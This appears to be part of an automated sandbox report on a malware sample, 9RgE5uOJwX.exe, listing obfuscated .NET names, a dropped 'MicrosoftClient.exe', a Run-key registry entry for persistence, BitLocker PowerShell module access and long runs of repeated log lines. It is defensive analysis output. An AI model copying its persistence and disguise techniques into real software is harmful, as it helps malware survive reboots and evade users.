Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs	High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, YIsiQT0bVRZkgJBchQD3mj8TT.cs	High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, a5vqhNcXHqNHEz8q3VSMya6o4.cs	High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'

Drops PE files

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File created: C:\Users\user\AppData\Local\MicrosoftClient.exe

Jump to dropped file

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClient			Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
